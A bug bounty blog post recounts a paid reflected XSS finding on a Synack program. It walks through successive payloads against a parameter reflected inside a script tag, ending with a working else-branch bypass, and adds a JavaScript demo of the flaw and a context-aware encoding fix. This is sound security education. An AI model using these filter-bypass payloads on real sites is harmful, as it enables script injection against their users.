
XSSed my way to 1000$

Hello Guys, I recently encountered an amazing bypass on an endpoint of a program on Synack. Although the bug wasn’t hard to find, minimal programming knowledge helped me get over 1000$ on this program. As I have discussed the basics of Cross-Site Scripting in my previous blog, I’ll move directly to the case study. To know about Cross-Site Scripting, read my previous blog here. Please don’t forget to read the Bug Bounty Tip at the end of each post and also like, share and subscribe to the Blog.

Case Study: Reflected XSS filter bypass

The application under test was a three-tier web application – Presentation tier (Front-End/User Interface), Application Tier (Functional Logic) and Data Tier (Databases). As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com.

The application has a login page where users can sign in to the application using the credentials provided.

After visiting a few pages, a page was found with a parameter (let’s assume it to be a) whose value was reflected into a script tag in the response.

Try 1: As the value of parameter a was reflected in the response, the first instinct was to close the script tag, after which any payload can be inserted. It turned out that the application rejects the < (less than) symbol and filters " to &quot; and > to &gt;. As this method didn’t work, a payload had to be designed which didn’t use the symbols ", < and >.

Payload: example.com?a=')}<hello

Response: 500 Error

Payload: example.com?a=')}hello">

Response:

<script type="text/javascript">
            if (somefunction !== something) { something = true; }
            if (false) {
                something.start('')}hello&quot;&gt; '}
</script>

Try 2: As the value of parameter a was reflected inside the script tags, a simple payload of alert('XSS'); was entered. Although there wasn’t any issue with the filter on this payload, XSS didn’t fire on the target application.

Payload: example.com?a=hello')}alert('XSS');

Response:

<script type="text/javascript">
            if (somefunction !== something) { something = true; }
            if (false) {
                something.start('hello')}alert('XSS'); '}
</script>

Try 3: The thing to note was that although the payload had escaped the tag, it didn’t fire. After analysing the code for some time, it was found that the if condition where the payload fires is only considered when the condition on the first function:

            if (somefunction !== something) { something = true; }

is false. To bypass this, an alternative branch, the else condition, was used. If an else is attached to the if (false) condition above, the else branch holds true whenever the original condition does not, so the payload runs from the else branch and bypasses the if (false) block where it was reflected but never fired.

It was also observed that %0A moved the rest of the payload onto a new line.

Hence a payload was constructed as 1')}%0Aelse{%0Aalert('XSS');

Payload: example.com?a=1')}%0Aelse{%0Aalert('XSS');

Response:

<script type="text/javascript">
            if (somefunction !== something) { something = true; }
            if (false) {
                something.start('1')}
else{
alert('XSS'); ')
}
</script>

Try 4: The XSS didn’t fire because the trailing ') was left unclosed, hence the payload was then specified as:

Payload: example.com?a=1')}%0Aelse{%0Aalert('XSS');('

Response:

<script type="text/javascript">
            if (somefunction !== something) { something = true; }
            if (false) {
                something.start('1')}
else{
alert('XSS');(' ')
}
</script>

And the XSS box popped up on the webpage.

Final payload used: 1')}%0Aelse{%0Aalert('XSS');('

A bounty of $1100 was given by Synack.
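
The root cause in this case study is that the filter encodes for HTML while the value is reflected inside a JavaScript string. The following is an added example, not code from the tested application or from the original post: it models the reflection with a constructed template and filter, replays the Try 2 and Try 4 payloads against stubbed `something` and `alert` objects, and compares that with a render that emits the value as an escaped JS string literal. All function names (`template`, `htmlStyleFilter`, `jsStringLiteral`, `renderVulnerable`, `renderHardened`, `run`) are hypothetical.

```javascript
// Constructed model of the page's template: the value of parameter `a` lands
// inside a single-quoted JS string within an `if (false)` block.
const template = (v) => `if (false) {\n  something.start('${v} ')\n}`;

// Filter as the post describes it: '<' is rejected, '"' and '>' are HTML-encoded.
// Nothing here touches ' ) } or newlines, which is all the payload needs.
function htmlStyleFilter(value) {
  if (value.includes('<')) throw new Error('500');
  return value.replace(/"/g, '&quot;').replace(/>/g, '&gt;');
}

// Context-aware encoding: emit a complete JS string literal, with characters
// that matter to the HTML parser or to a quoted string written as \uXXXX.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&'\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

const renderVulnerable = (a) => template(htmlStyleFilter(a));
const renderHardened = (a) =>
  `if (false) {\n  something.start(${jsStringLiteral(a)})\n}`;

// Parse and run a script body against stubs; report alert() calls or a parse error.
function run(body) {
  const calls = [];
  try {
    new Function('something', 'alert', body)({ start() {} }, (m) => calls.push(m));
    return { calls, error: null };
  } catch (e) {
    return { calls, error: e.name };
  }
}

// The payloads from Try 2 and Try 4 above, URL-decoded as the server would see them.
const try2 = decodeURIComponent("hello')}alert('XSS');");
const try4 = decodeURIComponent("1')}%0Aelse{%0Aalert('XSS');('");

console.log(run(renderVulnerable(try2))); // unbalanced quote: script fails to parse
console.log(run(renderVulnerable(try4))); // balanced: else branch reaches the alert stub
console.log(run(renderHardened(try4)));   // payload stays data, nothing runs
console.log(renderHardened(try4));
```

The hardened render never places raw input between quotes the template wrote itself; the encoder produces the whole literal, so quotes, brackets and line feeds in the input cannot change the script's structure.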

That’s all for this Blog. Hope you liked it.

#BugBountyTip: When signing up, try to claim a username that collides with existing page namespaces, such as /login. This can have unpredictable outcomes.
@EdOverflow

That’s all for today. Please subscribe to my blog. Connect with me on LinkedIn.

Gaurav Narwani

10 Replies to “XSSed my way to 1000$”

  1. Enjoyed reading it! Keep it up 🙂 you have my full support bro 😀

  2. Hello Gaurav,
    I am preparing for the Synack Red Team, and I also report some vulnerabilities to openbugbounty as well as some other bounty programs. Can you guide me on what the scenario of the Synack interview is?